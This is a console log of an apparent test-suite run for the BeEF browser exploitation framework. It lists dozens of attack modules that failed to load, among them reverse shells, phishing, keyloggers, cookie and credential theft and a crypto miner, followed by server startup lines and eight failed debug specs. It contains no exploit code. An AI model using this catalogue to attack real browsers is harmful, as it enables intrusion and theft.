-[12:25:44][!] Unable to load module 'Netgear_gs108t_csrf' -[12:25:44][!] Unable to load module 'Dlink_dgs_1100_device_reset_csrf' -[12:25:44][!] Unable to load module 'Dlink_dgs_1100_fdb_whitelist_csrf' -[12:25:44][!] Unable to load module 'Dlink_dgs_1100_port_mirroring_csrf' -[12:25:44][!] Unable to load module 'groovyshell_server_command_execution' -[12:25:44][!] Unable to load module 'jboss_jmx_upload_exploit' -[12:25:44][!] Unable to load module 'skype_xss' -[12:25:44][!] Unable to load module 'serendipity_1_6_xss' -[12:25:44][!] Unable to load module 'sqlitemanager_xss' -[12:25:44][!] Unable to load module 'cisco_collaboration_server_5_xss' -[12:25:44][!] Unable to load module 'alienvault_ossim_3_1_xss' -[12:25:44][!] Unable to load module 'extract_cmd_exec' -[12:25:44][!] Unable to load module 'monowall_reverse_root_shell_csrf' -[12:25:44][!] Unable to load module 'BeEF_bind_shell' -[12:25:44][!] Unable to load module 'Eudora_mail_beef_bind' -[12:25:44][!] Unable to load module 'Active_fax_beef_bind' -[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_admin_password' -[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass' -[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_migrate_hook' -[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_file_disclosure' -[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_admin_static_token' -[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_scanner' -[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_admin_dynamic_token' -[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_reverse_shell_csrf_sop' -[12:25:44][!] Unable to load module 'jenkins_groovy_code_exec' -[12:25:44][!] Unable to load module 'zenoss_command_execution' -[12:25:44][!] Unable to load module 'activex_command_execution' -[12:25:44][!] Unable to load module 'ie_ms12_004_midi' -[12:25:44][!] Unable to load module 'windows_mail_client_dos' -[12:25:44][!] Unable to load module 'java_payload' -[12:25:44][!] Unable to load module 'signed_applet_dropper' -[12:25:44][!] Unable to load module 'ie_ms13_069_caret' -[12:25:44][!] Unable to load module 'safari_launch_app' -[12:25:44][!] Unable to load module 'ruby_nntpd_cmd_exec' -[12:25:44][!] Unable to load module 'farsite_X25_remote_shell' -[12:25:44][!] Unable to load module 'php_dos' -[12:25:44][!] Unable to load module 'rfi_scanner' -[12:25:44][!] Unable to load module 'resource_exhaustion_dos' -[12:25:44][!] Unable to load module 'phonegap_check_connection' -[12:25:44][!] Unable to load module 'phonegap_list_files' -[12:25:44][!] Unable to load module 'phonegap_start_record_audio' -[12:25:44][!] Unable to load module 'phonegap_file_upload' -[12:25:44][!] Unable to load module 'phonegap_prompt_user' -[12:25:44][!] Unable to load module 'phonegap_persist_resume' -[12:25:44][!] Unable to load module 'phonegap_globalization_status' -[12:25:44][!] Unable to load module 'phonegap_keychain' -[12:25:44][!] Unable to load module 'phonegap_list_contacts' -[12:25:44][!] Unable to load module 'phonegap_persistence' -[12:25:44][!] Unable to load module 'phonegap_alert_user' -[12:25:44][!] Unable to load module 'phonegap_geo_locate' -[12:25:44][!] Unable to load module 'phonegap_plugin_detection' -[12:25:44][!] Unable to load module 'phonegap_detect' -[12:25:44][!] Unable to load module 'phonegap_stop_record_audio' -[12:25:44][!] Unable to load module 'phonegap_beep' -[12:25:44][!] Unable to load module 'steal_autocomplete' -[12:25:44][!] Unable to load module 'text_to_voice' -[12:25:44][!] Unable to load module 'pretty_theft' -[12:25:44][!] Unable to load module 'gmail_phishing' -[12:25:44][!] Unable to load module 'ui_abuse_ie' -[12:25:44][!] Unable to load module 'fake_lastpass' -[12:25:44][!] Unable to load module 'tabnabbing' -[12:25:44][!] Unable to load module 'sitekiosk_breakout' -[12:25:44][!] Unable to load module 'fake_notification_ie' -[12:25:44][!] Unable to load module 'replace_video_fake_plugin' -[12:25:44][!] Unable to load module 'fake_notification' -[12:25:44][!] Unable to load module 'clippy' -[12:25:44][!] Unable to load module 'fake_evernote_clipper' -[12:25:44][!] Unable to load module 'firefox_extension_reverse_shell' -[12:25:44][!] Unable to load module 'simple_hijacker' -[12:25:44][!] Unable to load module 'hta_powershell' -[12:25:44][!] Unable to load module 'clickjacking' -[12:25:44][!] Unable to load module 'spoof_addressbar_data' -[12:25:44][!] Unable to load module 'fake_notification_c' -[12:25:44][!] Unable to load module 'lcamtuf_download' -[12:25:44][!] Unable to load module 'edge_wscript_wsh_injection' -[12:25:44][!] Unable to load module 'firefox_extension_dropper' -[12:25:44][!] Unable to load module 'firefox_extension_bindshell' -[12:25:44][!] Unable to load module 'fake_notification_ff' -[12:25:44][!] Unable to load module 'fake_flash_update' -[12:25:44][!] Unable to load module 'cross_site_printing' -[12:25:44][!] Unable to load module 'cross_site_faxing' -[12:25:44][!] Unable to load module 'inter_protocol_win_bindshell' -[12:25:44][!] Unable to load module 'etag_client' -[12:25:44][!] Unable to load module 's2c_dns_tunnel' -[12:25:44][!] Unable to load module 'inter_protocol_imap' -[12:25:44][!] Unable to load module 'inter_protocol_redis' -[12:25:44][!] Unable to load module 'inter_protocol_posix_bindshell' -[12:25:44][!] Unable to load module 'inter_protocol_irc' -[12:25:44][!] Unable to load module 'send_inotes' -[12:25:44][!] Unable to load module 'extract_inotes_list' -[12:25:44][!] Unable to load module 'send_inotes_with_attachment' -[12:25:44][!] Unable to load module 'read_inotes' -[12:25:44][!] Unable to load module 'inotes_flooder' -[12:25:44][!] Unable to load module 'read_gmail' -[12:25:44][!] Unable to load module 'invisible_iframe' -[12:25:44][!] Unable to load module 'local_file_theft' -[12:25:44][!] Unable to load module 'iframe_keylogger' -[12:25:44][!] Unable to load module 'wordpress_current_user_info' -[12:25:44][!] Unable to load module 'wordpress_add_user' -[12:25:44][!] Unable to load module 'wordpress_upload_rce_plugin' -[12:25:44][!] Unable to load module 'wordpress_post_auth_rce' -[12:25:44][!] Unable to load module 'unblockui' -[12:25:44][!] Unable to load module 'iframe_sniffer' -[12:25:44][!] Unable to load module 'raw_javascript' -[12:25:44][!] Unable to load module 'blockui' -[12:25:44][!] Unable to load module 'no_sleep' -[12:25:44][!] Unable to load module 'cryptoloot_miner' -[12:25:44][!] Unable to load module 'track_physical_movement' -[12:25:44][!] Unable to load module 'detect_airdroid' -[12:25:44][!] Unable to load module 'get_registry_keys' -[12:25:44][!] Unable to load module 'iphone_tel' -[12:25:44][!] Unable to load module 'detect_protocol_handlers' -[12:25:44][!] Unable to load module 'physical_location_thirdparty' -[12:25:44][!] Unable to load module 'detect_coupon_printer' -[12:25:44][!] Unable to load module 'hook_microsoft_edge' -[12:25:44][!] Unable to load module 'detect_hp' -[12:25:44][!] Unable to load module 'detect_local_drives' -[12:25:44][!] Unable to load module 'get_battery_status' -[12:25:44][!] Unable to load module 'detect_cups' -[12:25:44][!] Unable to load module 'get_system_info_java' -[12:25:44][!] Unable to load module 'get_internal_ip_java' -[12:25:44][!] Unable to load module 'detect_antivirus' -[12:25:44][!] Unable to load module 'clipboard_theft' -[12:25:44][!] Unable to load module 'physical_location' -[12:25:44][!] Unable to load module 'detect_google_desktop' -[12:25:44][!] Unable to load module 'detect_default_browser' -[12:25:44][!] Unable to load module 'get_internal_ip_webrtc' -[12:25:44][!] Unable to load module 'get_connection_type' -[12:25:44][!] Unable to load module 'detect_users' -[12:25:44][!] Unable to load module 'detect_software' -[12:25:44][!] Unable to load module 'get_wireless_keys' -[12:25:44][!] Unable to load module 'hook_default_browser' -[12:25:44][!] Unable to load module 'popunder_window' -[12:25:44][!] Unable to load module 'popunder_window_ie' -[12:25:44][!] Unable to load module 'iframe_above' -[12:25:44][!] Unable to load module 'hijack_opener' -[12:25:44][!] Unable to load module 'invisible_htmlfile_activex' -[12:25:44][!] Unable to load module 'confirm_close_tab' -[12:25:44][!] Unable to load module 'man_in_the_browser' -[12:25:44][!] Unable to load module 'jsonp_service_worker' -[12:25:44][!] Unable to load module 'send_gvoice_sms' -[12:25:44][!] Unable to load module 'get_all_cookies' -[12:25:44][!] Unable to load module 'execute_tabs' -[12:25:44][!] Unable to load module 'grab_google_contacts' -[12:25:44][!] Unable to load module 'inject_beef' -[12:25:44][!] Unable to load module 'screenshot' -[12:25:54][>] Server: mounted handler '/hook.js' -[12:25:54][>] Server: mounted handler '/init' -[12:25:54][>] Server: mounted handler '/' -[12:25:54][>] Server: mounted handler '/dh' -[12:25:54][>] Server: mounted handler '/api/hooks' -[12:25:54][>] Server: mounted handler '/api/browserdetails' -[12:25:54][>] Server: mounted handler '/api/modules' -[12:25:54][>] Server: mounted handler '/api/categories' -[12:25:54][>] Server: mounted handler '/api/logs' -[12:25:54][>] Server: mounted handler '/api/admin' -[12:25:54][>] Server: mounted handler '/api/server' -[12:25:54][>] Server: mounted handler '/api/autorun' -[12:25:54][>] Server: mounted handler '/api/dns' -[12:25:54][>] Server: mounted handler '/api/ipec' -[12:25:54][>] Server: mounted handler '/api/proxy' -[12:25:54][>] Server: mounted handler '/requester' -[12:25:54][>] Server: mounted handler '/api/requester' -[12:25:54][>] Server: mounted handler '/xssrays' -[12:25:54][>] Server: mounted handler '/api/xssrays' -[12:25:54][>] Server: mounted handler '/api/network' -[12:25:54][>] Server: mounted handler '/api/seng' -[12:25:54][>] Server: mounted handler '/ps' -[12:25:54][>] Server: mounted handler '/ui/authentication' -[12:25:54][>] Server: mounted handler '/ui/panel' -[12:25:54][>] Server: mounted handler '/ui/modules' -[12:25:54][>] Server: mounted handler '/ui/media' -[12:25:54][>] [AdminUI] Initializing admin panel ... -[12:25:54][>] [AdminUI] Minifying web_ui_all (384858 bytes) -[12:25:57][>] [AdminUI] Minified web_ui_all (215617 bytes) -[12:25:57][>] [AdminUI] Minifying web_ui_auth (1787 bytes) -[12:25:58][>] [AdminUI] Minified web_ui_auth (1122 bytes) -[12:25:58][>] Server: mounted handler '/ui/web_ui_all.js' -[12:25:58][>] Server: mounted handler '/ui/web_ui_auth.js' -[12:25:58][>] Server: mounted handler '/event' -[12:25:58][>] Server: mounted handler '/demos' -[12:25:58][>] Server: mounted handler '/demos/report.html' -[12:25:58][>] Server: mounted handler '/demos/clickjacking/clickjack_victim.html' -[12:25:58][>] Server: mounted handler '/demos/clickjacking/clickjack_attack.html' -[12:25:58][>] Server: mounted handler '/demos/butcher/index.html' -[12:25:58][>] Server: mounted handler '/demos/basic.html' -[12:25:58][>] Server: mounted handler '/demos/plain.html' -[12:25:58][>] Server: mounted handler '/demos/secret_page.html' -[12:25:58][*] DNS Server: 127.0.0.1:5300 (udp) -[12:25:58] | Upstream Server: 8.8.8.8:53 (udp) -[12:25:58] |_ Upstream Server: 8.8.8.8:53 (tcp) -[12:25:58][*] HTTP Proxy: http://127.0.0.1:6789 -[12:25:58][!] API Fire Error: undefined method `each' for nil:NilClass in {:owner=>BeEF::Extension::Qrcode::QrcodeGenerator, :id=>16}.pre_http_start() - The Test_beef.debug() command module successfully executes (FAILED - 1) - The Return ASCII Characters command module successfully executes (FAILED - 2) - The Return Image command module successfully executes (FAILED - 3) - The Test HTTP Redirect command module successfully executes (FAILED - 4) - The Test Returning Results/Long String command module successfully executes (FAILED - 5) - The Test Network Request command module successfully executes (FAILED - 6) - The Test DNS Tunnel command module successfully executes (FAILED - 7) - The Test CORS Request command module successfully executes (FAILED - 8) - -BeEF Extension WebRTC - loads configuration - -BeEF BrowserDetails - set value - set nil value -[12:26:07][>] Browser has updated 'vtxpofqjbf' to 'pydkilbgwy' - update value - -BeEF Extension Console - loads configuration - -BeEF Extension Network - add good not local host - add good local host - add good service - -BeEF API Rate Limit -[12:26:07][>] Server: mounted handler '/hook.js' -[12:26:07][>] Server: mounted handler '/init' -[12:26:07][>] Server: mounted handler '/' -[12:26:07][>] Server: mounted handler '/dh' -[12:26:07][>] Server: mounted handler '/api/hooks' -[12:26:07][>] Server: mounted handler '/api/browserdetails' -[12:26:07][>] Server: mounted handler '/api/modules' -[12:26:07][>] Server: mounted handler '/api/categories' -[12:26:07][>] Server: mounted handler '/api/logs' -[12:26:07][>] Server: mounted handler '/api/admin' -[12:26:07][>] Server: mounted handler '/api/server' -[12:26:07][>] Server: mounted handler '/api/autorun' -[12:26:07][>] Server: mounted handler '/api/dns' -[12:26:07][>] Server: mounted handler '/api/ipec' -[12:26:07][>] Server: mounted handler '/api/proxy' -[12:26:07][>] Server: mounted handler '/requester' -[12:26:07][>] Server: mounted handler '/api/requester' -[12:26:07][>] Server: mounted handler '/xssrays' -[12:26:07][>] Server: mounted handler '/api/xssrays' -[12:26:07][>] Server: mounted handler '/api/network' -[12:26:07][>] Server: mounted handler '/api/seng' -[12:26:07][>] Server: mounted handler '/ps' -[12:26:07][>] Server: mounted handler '/ui/authentication' -[12:26:07][>] Server: mounted handler '/ui/panel' -[12:26:07][>] Server: mounted handler '/ui/modules' -[12:26:07][>] Server: mounted handler '/ui/media' -[12:26:07][>] [AdminUI] Initializing admin panel ... -[12:26:07][>] [AdminUI] Minifying web_ui_all (384858 bytes) -[12:26:10][>] [AdminUI] Minified web_ui_all (215617 bytes) -[12:26:10][>] [AdminUI] Minifying web_ui_auth (1787 bytes) -[12:26:11][>] [AdminUI] Minified web_ui_auth (1122 bytes) -[12:26:11][>] Server: mounted handler '/ui/web_ui_all.js' -[12:26:11][>] Server: mounted handler '/ui/web_ui_auth.js' -[12:26:11][>] Server: mounted handler '/event' -[12:26:11][>] Server: mounted handler '/demos' -[12:26:11][>] Server: mounted handler '/demos/report.html' -[12:26:11][>] Server: mounted handler '/demos/clickjacking/clickjack_victim.html' -[12:26:11][>] Server: mounted handler '/demos/clickjacking/clickjack_attack.html' -[12:26:11][>] Server: mounted handler '/demos/butcher/index.html' -[12:26:11][>] Server: mounted handler '/demos/basic.html' -[12:26:11][>] Server: mounted handler '/demos/plain.html' -[12:26:11][>] Server: mounted handler '/demos/secret_page.html' -[12:26:11][*] DNS Server: 127.0.0.1:5300 (udp) -[12:26:11] | Upstream Server: 8.8.8.8:53 (udp) -[12:26:11] |_ Upstream Server: 8.8.8.8:53 (tcp) -[12:26:11][*] HTTP Proxy: http://127.0.0.1:6789 -[12:26:11][!] API Fire Error: undefined method `each' for nil:NilClass in {:owner=>BeEF::Extension::Qrcode::QrcodeGenerator, :id=>16}.pre_http_start() -speed requesets -delayed requests -speed requesets -delayed requests -speed requesets -delayed requests - adheres to auth rate limits - -BeEF Extension AdminUI - confirms that X-Forwarded-For cant be spoofed when reverse proxy is disabled - confirms that an ip address is permitted to view the admin ui - confirms that an ip address is not permitted to view the admin ui - loads configuration - confirms that any ip address is permitted to view the admin ui - -BeEF Extension WebSockets - confirms that a secure websocket server has been started -[12:26:47][>] [WebSocket] New WebSocket channel open. - confirms that a websocket client can connect to the BeEF Websocket Server - confirms that a websocket server has been started - -BeEF Extension DNS -[12:26:48][>] [WebSocket] Connection closed: {:code=>1000, :reason=>"", :was_clean=>true} - failure types - get ruleset - remove ruleset - loaded configuration - remove bad rule - get good rule - responds to interfaces - remove good rule - get bad rule - add good rule - 1.2.3.4 - 9.9.9.9 - domains - add bad rule - 4.2.4.2 - -BeEF Extension XSSRays - interface - loads configuration - -BeEF Filesystem - required files - executable directories - -BeEF Extension QRCode - loads configuration - -BeEF Filters - has_valid_param_chars? - true - false - is_non_empty_string? - Four num chars begining with null - First char is num - null - First char is alpha - Empty String - Integer - Four num chars - Four num chars begining with alpha - nil - alphanums_only? - true with - lowercase - uppercase - numbers - general - false with - additional nulls - alphabet around null - general - alphabet null after - alphabet null before - only? - fail - success - is_valid_float? - true with general - false with general - has_non_printable_char? - true with - general - alphabet null before - false with - lowercase - general - uppercase - numbers - nums_only? - false with general - true with general - first_char_is_num? - false with general - true with general - hexs_only? - true with general - false with general - has_null? - false with - general - alphabet - true with - general - alphabet null before - alphabet null after - exists? - success - fail - has_whitespace_char? - false with general - true with general - -BeEF Extensions -[12:26:48][>] Loaded extension: 'network' -[12:26:48][>] Loaded extension: 'social_engineering' -[12:26:48][>] Loaded extension: 'admin_ui' -[12:26:48][>] Loaded extension: 'events' -[12:26:48][>] Loaded extension: 'requester' -[12:26:48][>] Loaded extension: 'proxy' -[12:26:48][>] Loaded extension: 'xssrays' -[12:26:48][>] Loaded extension: 'demos' - loaded successfully - -Pending: (Failures listed here are expected and do not affect your suite's status) - - 1) BeEF Extension Requester requester works - # Temporarily skipped with xit - # ./spec/beef/extensions/requester_spec.rb:22 - -Failures: - - 1) BeEF Debug Command Modules: The Test_beef.debug() command module successfully executes - Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] - - NoMethodError: - undefined method `[]' for nil:NilClass - # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' - - 2) BeEF Debug Command Modules: The Return ASCII Characters command module successfully executes - Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] - - NoMethodError: - undefined method `[]' for nil:NilClass - # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' - - 3) BeEF Debug Command Modules: The Return Image command module successfully executes - Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] - - NoMethodError: - undefined method `[]' for nil:NilClass - # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' - - 4) BeEF Debug Command Modules: The Test HTTP Redirect command module successfully executes - Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] - - NoMethodError: - undefined method `[]' for nil:NilClass - # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' - - 5) BeEF Debug Command Modules: The Test Returning Results/Long String command module successfully executes - Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] - - NoMethodError: - undefined method `[]' for nil:NilClass - # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' - - 6) BeEF Debug Command Modules: The Test Network Request command module successfully executes - Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] - - NoMethodError: - undefined method `[]' for nil:NilClass - # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' - - 7) BeEF Debug Command Modules: The Test DNS Tunnel command module successfully executes - Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] - - NoMethodError: - undefined method `[]' for nil:NilClass - # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' - - 8) BeEF Debug Command Modules: The Test CORS Request command module successfully executes - Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] - - NoMethodError: - undefined method `[]' for nil:NilClass - # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' - -Finished in 1 minute 32.71 seconds (files took 1.53 seconds to load) -112 examples, 8 failures, 1 pending - -Failed examples: - -rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:97 # BeEF Debug Command Modules: The Test_beef.debug() command module successfully executes -rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:106 # BeEF Debug Command Modules: The Return ASCII Characters command module successfully executes -rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:115 # BeEF Debug Command Modules: The Return Image command module successfully executes -rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:125 # BeEF Debug Command Modules: The Test HTTP Redirect command module successfully executes -rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:134 # BeEF Debug Command Modules: The Test Returning Results/Long String command module successfully executes -rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:144 # BeEF Debug Command Modules: The Test Network Request command module successfully executes -rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:161 # BeEF Debug Command Modules: The Test DNS Tunnel command module successfully executes -rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:171 # BeEF Debug Command Modules: The Test CORS Request command module successfully executes - -Randomized with seed 39338 -